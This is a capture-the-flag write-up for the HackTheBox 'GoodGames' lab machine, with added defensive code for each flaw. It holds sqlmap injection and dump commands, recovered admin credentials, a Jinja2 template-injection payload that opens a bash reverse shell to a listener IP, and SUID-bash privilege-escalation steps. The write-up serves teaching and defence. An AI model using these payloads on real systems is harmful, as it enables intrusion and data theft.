# HackTheBox GoodGames Writeup

Explore the fundamentals of cybersecurity in the GoodGames Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
## Add Hosts

```
10.10.11.130 goodgames.htb internal-administration.goodgames.htb
```

### Script to add hosts automatically

Appends the entry to `/etc/hosts` only if it is not already present:

```bash
ip="10.10.11.130"
domain="goodgames.htb internal-administration.goodgames.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
```
## Mapping

```bash
nmap -sCV goodgames.htb
```

```
Nmap scan report for goodgames.htb (10.10.11.130)
Host is up (0.053s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.9.2)
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
```

Only port 80 is open: a Python web application served directly by the Werkzeug development server.
## Exploiting GoodGames HTB

- Register an account at http://goodgames.htb/signup.
- Intercept the login request and test the `email` parameter for SQL injection with sqlmap:

```bash
sqlmap -u "http://goodgames.htb/login" \
--data="email=1&password=a@a.com" \
--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
--referer="http://goodgames.htb/signup" \
-p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10
```
- List the databases with sqlmap:

```bash
sqlmap -u "http://goodgames.htb/login" \
--data="email=1&password=a@a.com" \
--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
--referer="http://goodgames.htb/signup" \
-p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 --dbs
```

- Dump the `main` database:

```bash
sqlmap -u "http://goodgames.htb/login" \
--data="email=1&password=a@a.com" \
--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
--referer="http://goodgames.htb/signup" \
-p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 -D main --dump
```
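The defect sqlmap is finding in the `email` parameter is a login handler that pastes request fields into the SQL text. The following is an added example, not code from the box or from this writeup: it reconstructs the vulnerable pattern next to its parameterised fix on a constructed in-memory SQLite table (the real target runs MySQL, but the query-building mistake is the same). The table name, columns and the sample row are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (email TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES ('admin@goodgames.htb', 'secret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> bool:
    # DANGEROUS: the request fields become part of the SQL source, so a quote in
    # `email` terminates the string literal and the remainder is parsed as SQL.
    # This is the shape of bug behind sqlmap reporting `email` as injectable.
    query = (
        f"SELECT email FROM user WHERE email = '{email}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> bool:
    # Parameterised query: the SQL text is fixed and the values travel separately,
    # so whatever the client sent is compared as data and never parsed as code.
    query = "SELECT email FROM user WHERE email = ? AND password = ?"
    return conn.execute(query, (email, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Constructed probe: closes the string, adds a tautology, comments out the rest.
    probe = "x' OR 1=1 -- "
    print("vulnerable handler accepts probe:", login_vulnerable(db, probe, "anything"))
    print("parameterised handler accepts probe:", login_safe(db, probe, "anything"))
```

The fix is purely in how the query is built; no input filtering is involved, which is why it also stops the blind, time-based and UNION techniques sqmap cycles through at `--level=5 --risk=3`.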
## Searching the Hash

- Search for the hash `2b22337f218b2d82dfc3b6f77e7cb8ec` on Google, which reveals the password.
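The dumped value is 32 hexadecimal characters, the length of an unsalted MD5 digest, which is why a search engine can resolve it: the same word always produces the same digest, so one public table serves every site. The block below is an added example, not code from the writeup or the application. It shows the wordlist match that a lookup table performs, then the salted, iterated storage (PBKDF2-HMAC-SHA256 from the standard library) that makes such lookups useless. The wordlist is constructed; the stored-hash format is my own.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the public lookup tables behind a
# "paste the hash into Google" result.
WORDLIST = ["password", "admin123", "letmein", "superadministrator"]


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def crack_unsalted_md5(hex_digest: str, wordlist=WORDLIST):
    """Return the wordlist entry whose MD5 equals `hex_digest`, or None.
    Unsalted MD5 is deterministic and cheap, so every deployment that stores
    md5('letmein') stores the identical 32 hex characters."""
    hex_digest = hex_digest.strip().lower()
    for word in wordlist:
        if md5_hex(word) == hex_digest:
            return word
    return None


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256. The random salt makes each stored value unique
    per user (no shared table can match it) and the iteration count makes every
    guess expensive. Stored as a self-describing 'algo$iters$salt$digest' string."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison: does not leak how many leading bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    leaked = "2b22337f218b2d82dfc3b6f77e7cb8ec"  # the digest dumped from the `main` database
    print("wordlist match:", crack_unsalted_md5(leaked))
    stored = hash_password("superadministrator")
    print("stored form:", stored)
    print("verifies:", verify_password("superadministrator", stored))
```

Two stored values for the same password differ because of the salt, so an attacker who dumps the table gets nothing to look up and has to pay the full iteration cost per guess per user.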
## Logging into Internal Admin Panel

Log in at http://internal-administration.goodgames.htb/login with the recovered credentials:

```
admin:superadministrator
```

The interesting page is http://internal-administration.goodgames.htb/settings.
## Exploit SSTI for Reverse Shell

- Change the username on the settings page, capture the request, and replace the username with the SSTI payload that spawns the reverse shell (shown URL-encoded as it is sent in the request body; adjust the IP and port to match your listener):

```
{{ namespace.__init__.__globals__.os.popen('bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.10/9001+0>%261"').read() }}
```

- Upgrade to a fully interactive shell:

```bash
script /dev/null -c bash
```

- Fix the terminal and bring the shell back to the foreground: press Ctrl + Z to background the shell, then run:

```bash
stty raw -echo; fg
```
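The payload above only works because the username is inserted into the template source rather than passed to the template as a value. This added example (not the application's code, and assuming the engine is Jinja2, which the `namespace.__init__.__globals__` chain implies; `jinja2` must be installed) shows the vulnerable pattern beside the fix, and shows that Jinja2's `SandboxedEnvironment` refuses the dunder attribute access that such gadget chains depend on. The greeting text and function names are my own.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment


def render_profile_vulnerable(username: str) -> str:
    # DANGEROUS: the username is concatenated into the template *source*, so any
    # {{ ... }} it contains is compiled and evaluated as template code. This is the
    # defect that turns a "change username" form into code execution.
    template_source = "Welcome, " + username + "!"
    return Environment().from_string(template_source).render()


def render_profile_safe(username: str) -> str:
    # The template source is a constant; the username arrives as *data* through the
    # render context and is only ever printed. autoescape also neutralises HTML in
    # the value, so the same field cannot become a stored-XSS sink.
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string("Welcome, {{ name }}!").render(name=username)


def sandbox_blocks(template_source: str) -> bool:
    """Defence in depth: even if untrusted text did reach the template source,
    the sandbox rejects attribute names starting with an underscore (__init__,
    __globals__, __class__ ...). Returns True if rendering was refused."""
    try:
        SandboxedEnvironment().from_string(template_source).render()
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    probe = "{{ 7 * 7 }}"  # harmless arithmetic probe for template evaluation
    print("vulnerable:", render_profile_vulnerable(probe))
    print("safe:      ", render_profile_safe(probe))
    # `namespace` is a Jinja2 built-in global, so this is the start of the chain
    # used in the writeup, cut off before it reaches os.popen.
    print("sandbox blocks dunder chain:", sandbox_blocks("{{ namespace.__init__.__globals__ }}"))
```

The sandbox is a backstop, not the fix: the real correction is the second function, where user input never becomes template source. In Flask that is `render_template_string("... {{ name }} ...", name=username)` with a literal first argument, never an f-string.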
## Gaining Access

- Read `user.txt`:

```bash
cat /home/augustus/user.txt
```

- Copy `bash` to the user's home directory:

```bash
cp /bin/bash /home/augustus
```

- Check whether you are inside a Docker container by looking for `.dockerenv` in the root directory:

```bash
ls -a /
```
## Network Exploration

- Ping sweep to find other hosts on the container network:

```bash
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
```

- Check for open ports on the discovered host (here `172.19.0.1`) using bash's built-in `/dev/tcp`:

```bash
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
```

- SSH into the discovered host, copy `bash` into the home directory there as well, and return to the container:

```bash
ssh augustus@172.19.0.1
cp /bin/bash /home/augustus
exit
```
## Privilege Escalation

- Back in the container shell, change the ownership of the copied `bash` to root and set the SUID bit so it runs with root privileges:

```bash
chown root:root /home/augustus/bash
chmod 4777 /home/augustus/bash
```

- Log in again via SSH:

```bash
ssh augustus@172.19.0.1
```

- Execute `bash` with `-p` so it keeps the effective root privileges instead of dropping them:

```bash
./bash -p
```

- Read `root.txt`:

```bash
cat /root/root.txt
```
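The escalation works because `/home/augustus` is visible from both the container and the host: a file given root ownership and the SUID bit inside the container is executed with that bit on the host. What that leaves behind is a root-owned setuid binary in a user's home, which is an easy thing to audit for. The script below is an added example, not part of the writeup: it walks a directory tree, reports every regular file with the setuid bit, classifies anything outside the package-managed binary directories as suspicious, and repeats the `.dockerenv` check the writeup does by hand. The directory allow-list and the label strings are my own choices.

```python
import os
import stat

# Directories where setuid binaries are expected (package-managed). Assumed list.
SYSTEM_BIN_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/")


def find_setuid_files(root: str):
    """Return [(path, owner_uid)] for every regular file under `root` that carries
    the setuid bit. Symlinks are not followed (lstat), unreadable entries are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or permission denied; keep auditing the rest
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def classify(path: str, owner_uid: int) -> str:
    """Label a setuid file. A root-owned one outside the system binary
    directories is exactly the artefact the shared-volume escalation leaves
    behind (a copy of bash in a home directory, chown root + chmod 4777)."""
    if path.startswith(SYSTEM_BIN_PREFIXES):
        return "expected"
    if owner_uid == 0:
        return "root-setuid-outside-system-dirs"
    return "setuid-outside-system-dirs"


def in_docker() -> bool:
    """Same signal the writeup checks with `ls -a /`."""
    return os.path.exists("/.dockerenv")


if __name__ == "__main__":
    for path, uid in find_setuid_files("/home"):
        print(f"{classify(path, uid)}: {path} (owner uid {uid})")
    print("inside docker:", in_docker())
```

Detection is the cheap part; the root cause is a container running as root with a host home directory bind-mounted into it. Running the container as an unprivileged user and not sharing host home directories removes the path entirely, and mounting any shared volume with the `nosuid` option makes the bit inert even if it is set.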